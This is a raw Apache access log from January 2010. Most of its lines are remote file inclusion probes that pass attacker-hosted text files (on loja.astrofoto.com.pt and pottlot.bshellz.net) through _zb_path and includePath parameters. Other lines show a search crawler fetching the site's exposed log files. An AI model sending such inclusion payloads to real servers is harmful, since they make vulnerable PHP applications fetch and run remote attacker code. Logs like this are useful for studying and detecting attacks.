74.223.143.131 - - [17/Jan/2010:02:12:53 -0500] "GET /logs/access_log.Q109110200/?_zb_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:13:10 -0500] "GET /?_zb_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:13:10 -0500] "GET /logs/?_zb_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 200 34516 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:13:10 -0500] "GET /logs/access_log.Q109110200/?_zb_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:02:12:56 -0500] "GET /logs/access_log.Q109053100 HTTP/1.0" 200 1986553 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.174 - - [17/Jan/2010:02:12:58 -0500] "GET /logs/error_log.Q109062000 HTTP/1.0" 200 2513969 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.174 - - [17/Jan/2010:02:14:11 -0500] "GET /logs/access_log.Q109080100 HTTP/1.0" 200 1996380 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.174 - - [17/Jan/2010:02:14:28 -0500] "GET /logs/error_log.Q109082700 HTTP/1.0" 200 2350040 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.80.193.27 - - [17/Jan/2010:02:16:01 -0500] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; DigExt; AT&T CSM8.0; .NET CLR 2.0.50727)"
173.212.202.130 - - [17/Jan/2010:02:16:13 -0500] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://pottlot.bshellz.net/c123.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
